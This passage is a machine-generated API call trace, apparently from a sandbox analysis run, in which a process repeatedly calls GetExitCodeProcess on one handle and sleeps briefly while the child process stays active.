(dwMilliseconds=0x19) [0221.145] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0221.145] Sleep (dwMilliseconds=0x19) [0221.214] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0221.214] Sleep (dwMilliseconds=0x19) [0221.466] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0221.466] Sleep (dwMilliseconds=0x19) [0221.572] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0221.572] Sleep (dwMilliseconds=0x19) [0221.685] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0221.686] Sleep (dwMilliseconds=0x19) [0221.780] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0221.780] Sleep (dwMilliseconds=0x19) [0221.859] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0221.859] Sleep (dwMilliseconds=0x19) [0221.894] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0221.894] Sleep (dwMilliseconds=0x19) [0221.930] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0221.930] Sleep (dwMilliseconds=0x19) [0221.967] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0221.967] Sleep (dwMilliseconds=0x19) [0222.009] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.009] Sleep (dwMilliseconds=0x19) [0222.057] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.057] Sleep (dwMilliseconds=0x19) [0222.093] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.094] Sleep (dwMilliseconds=0x19) [0222.169] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.170] Sleep (dwMilliseconds=0x19) [0222.229] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.229] Sleep (dwMilliseconds=0x19) [0222.350] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.350] Sleep (dwMilliseconds=0x19) [0222.385] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.385] Sleep (dwMilliseconds=0x19) [0222.454] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.454] Sleep (dwMilliseconds=0x19) [0222.553] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.553] Sleep (dwMilliseconds=0x19) [0222.595] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.595] Sleep (dwMilliseconds=0x19) [0222.666] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.666] Sleep (dwMilliseconds=0x19) [0222.701] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.701] Sleep (dwMilliseconds=0x19) [0222.741] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.741] Sleep (dwMilliseconds=0x19) [0222.781] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.781] Sleep (dwMilliseconds=0x19) [0222.909] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.909] Sleep (dwMilliseconds=0x19) [0222.945] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.945] Sleep (dwMilliseconds=0x19) [0222.990] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0222.990] Sleep (dwMilliseconds=0x19) [0223.032] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.032] Sleep (dwMilliseconds=0x19) [0223.095] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.095] Sleep (dwMilliseconds=0x19) [0223.135] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.135] Sleep (dwMilliseconds=0x19) [0223.181] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.181] Sleep (dwMilliseconds=0x19) [0223.220] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.220] Sleep (dwMilliseconds=0x19) [0223.291] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.291] Sleep (dwMilliseconds=0x19) [0223.328] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.328] Sleep (dwMilliseconds=0x19) [0223.362] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.362] Sleep (dwMilliseconds=0x19) [0223.403] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.404] Sleep (dwMilliseconds=0x19) [0223.438] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.438] Sleep (dwMilliseconds=0x19) [0223.494] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.494] Sleep (dwMilliseconds=0x19) [0223.573] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.573] Sleep (dwMilliseconds=0x19) [0223.630] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.630] Sleep (dwMilliseconds=0x19) [0223.666] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.666] Sleep (dwMilliseconds=0x19) [0223.701] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.701] Sleep (dwMilliseconds=0x19) [0223.737] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.737] Sleep (dwMilliseconds=0x19) [0223.774] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.774] Sleep (dwMilliseconds=0x19) [0223.810] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.811] Sleep (dwMilliseconds=0x19) [0223.856] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.856] Sleep (dwMilliseconds=0x19) [0223.926] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.926] Sleep (dwMilliseconds=0x19) [0223.960] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.960] Sleep (dwMilliseconds=0x19) [0223.994] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0223.994] Sleep (dwMilliseconds=0x19) [0224.077] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.077] Sleep (dwMilliseconds=0x19) [0224.113] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.113] Sleep (dwMilliseconds=0x19) [0224.162] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.162] Sleep (dwMilliseconds=0x19) [0224.199] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.199] Sleep (dwMilliseconds=0x19) [0224.318] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.318] Sleep (dwMilliseconds=0x19) [0224.352] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.352] Sleep (dwMilliseconds=0x19) [0224.391] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.392] Sleep (dwMilliseconds=0x19) [0224.429] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.429] Sleep (dwMilliseconds=0x19) [0224.465] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.465] Sleep (dwMilliseconds=0x19) [0224.504] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.504] Sleep (dwMilliseconds=0x19) [0224.589] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.590] Sleep (dwMilliseconds=0x19) [0224.665] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.665] Sleep (dwMilliseconds=0x19) [0224.744] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.745] Sleep (dwMilliseconds=0x19) [0224.785] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.785] Sleep (dwMilliseconds=0x19) [0224.938] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0224.938] Sleep (dwMilliseconds=0x19) [0225.023] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0225.023] Sleep (dwMilliseconds=0x19) [0225.172] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0225.172] Sleep (dwMilliseconds=0x19) [0225.308] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0225.308] Sleep (dwMilliseconds=0x19) [0225.441] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0225.441] Sleep (dwMilliseconds=0x19) [0225.513] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0225.513] Sleep (dwMilliseconds=0x19) [0225.601] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0225.601] Sleep (dwMilliseconds=0x19) [0225.689] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0225.689] Sleep (dwMilliseconds=0x19) [0225.734] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0225.734] Sleep (dwMilliseconds=0x19) [0225.772] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0225.772] Sleep (dwMilliseconds=0x19) [0225.822] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0225.822] Sleep (dwMilliseconds=0x19) [0225.882] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0225.882] Sleep (dwMilliseconds=0x19) [0225.928] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0225.928] Sleep (dwMilliseconds=0x19) [0225.981] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0225.982] Sleep (dwMilliseconds=0x19) [0226.015] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.016] Sleep (dwMilliseconds=0x19) [0226.055] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.056] Sleep (dwMilliseconds=0x19) [0226.082] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.082] Sleep (dwMilliseconds=0x19) [0226.123] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.123] Sleep (dwMilliseconds=0x19) [0226.228] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.228] Sleep (dwMilliseconds=0x19) [0226.333] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.333] Sleep (dwMilliseconds=0x19) [0226.431] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.431] Sleep (dwMilliseconds=0x19) [0226.471] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.471] Sleep (dwMilliseconds=0x19) [0226.512] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.512] Sleep (dwMilliseconds=0x19) [0226.539] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.539] Sleep (dwMilliseconds=0x19) [0226.566] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.566] Sleep (dwMilliseconds=0x19) [0226.608] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.608] Sleep (dwMilliseconds=0x19) [0226.639] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.640] Sleep (dwMilliseconds=0x19) [0226.685] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.685] Sleep (dwMilliseconds=0x19) [0226.900] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0226.901] Sleep (dwMilliseconds=0x19) [0227.002] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.002] Sleep (dwMilliseconds=0x19) [0227.105] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.105] Sleep (dwMilliseconds=0x19) [0227.158] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.158] Sleep (dwMilliseconds=0x19) [0227.209] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.209] Sleep (dwMilliseconds=0x19) [0227.243] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.243] Sleep (dwMilliseconds=0x19) [0227.339] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.339] Sleep (dwMilliseconds=0x19) [0227.374] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.374] Sleep (dwMilliseconds=0x19) [0227.423] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.424] Sleep (dwMilliseconds=0x19) [0227.494] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.494] Sleep (dwMilliseconds=0x19) [0227.550] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.550] Sleep (dwMilliseconds=0x19) [0227.663] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.663] Sleep (dwMilliseconds=0x19) [0227.705] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.705] Sleep (dwMilliseconds=0x19) [0227.771] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.771] Sleep (dwMilliseconds=0x19) [0227.852] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.853] Sleep (dwMilliseconds=0x19) [0227.888] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.888] Sleep (dwMilliseconds=0x19) [0227.922] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.922] Sleep (dwMilliseconds=0x19) [0227.966] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0227.966] Sleep (dwMilliseconds=0x19) [0228.002] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.002] Sleep (dwMilliseconds=0x19) [0228.038] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.038] Sleep (dwMilliseconds=0x19) [0228.099] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.099] Sleep (dwMilliseconds=0x19) [0228.138] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.138] Sleep (dwMilliseconds=0x19) [0228.201] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.201] Sleep (dwMilliseconds=0x19) [0228.245] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.245] Sleep (dwMilliseconds=0x19) [0228.342] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.342] Sleep (dwMilliseconds=0x19) [0228.382] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.382] Sleep (dwMilliseconds=0x19) [0228.445] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.445] Sleep (dwMilliseconds=0x19) [0228.481] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.481] Sleep (dwMilliseconds=0x19) [0228.538] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.538] Sleep (dwMilliseconds=0x19) [0228.584] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.584] Sleep (dwMilliseconds=0x19) [0228.618] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.618] Sleep (dwMilliseconds=0x19) [0228.654] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.654] Sleep (dwMilliseconds=0x19) [0228.726] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.726] Sleep (dwMilliseconds=0x19) [0228.849] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.849] Sleep (dwMilliseconds=0x19) [0228.887] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.888] Sleep (dwMilliseconds=0x19) [0228.924] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.924] Sleep (dwMilliseconds=0x19) [0228.961] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.961] Sleep (dwMilliseconds=0x19) [0228.998] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0228.998] Sleep (dwMilliseconds=0x19) [0229.034] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.034] Sleep (dwMilliseconds=0x19) [0229.107] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.107] Sleep (dwMilliseconds=0x19) [0229.147] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.147] Sleep (dwMilliseconds=0x19) [0229.182] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.182] Sleep (dwMilliseconds=0x19) [0229.217] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.217] Sleep (dwMilliseconds=0x19) [0229.285] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.285] Sleep (dwMilliseconds=0x19) [0229.321] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.321] Sleep (dwMilliseconds=0x19) [0229.362] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.362] Sleep (dwMilliseconds=0x19) [0229.404] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.404] Sleep (dwMilliseconds=0x19) [0229.439] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.440] Sleep (dwMilliseconds=0x19) [0229.477] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.477] Sleep (dwMilliseconds=0x19) [0229.511] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.511] Sleep (dwMilliseconds=0x19) [0229.546] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.546] Sleep (dwMilliseconds=0x19) [0229.595] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.595] Sleep (dwMilliseconds=0x19) [0229.679] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.679] Sleep (dwMilliseconds=0x19) [0229.734] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.734] Sleep (dwMilliseconds=0x19) [0229.775] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.775] Sleep (dwMilliseconds=0x19) [0229.811] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.811] Sleep (dwMilliseconds=0x19) [0229.919] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0229.919] Sleep (dwMilliseconds=0x19) [0230.091] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.091] Sleep (dwMilliseconds=0x19) [0230.147] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.147] Sleep (dwMilliseconds=0x19) [0230.230] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.230] Sleep (dwMilliseconds=0x19) [0230.305] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.305] Sleep (dwMilliseconds=0x19) [0230.342] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.342] Sleep (dwMilliseconds=0x19) [0230.378] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.378] Sleep (dwMilliseconds=0x19) [0230.412] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.413] Sleep (dwMilliseconds=0x19) [0230.464] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.464] Sleep (dwMilliseconds=0x19) [0230.499] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.499] Sleep (dwMilliseconds=0x19) [0230.575] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.575] Sleep (dwMilliseconds=0x19) [0230.633] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.634] Sleep (dwMilliseconds=0x19) [0230.704] GetExitCodeProcess (in: hProcess=0x40c, 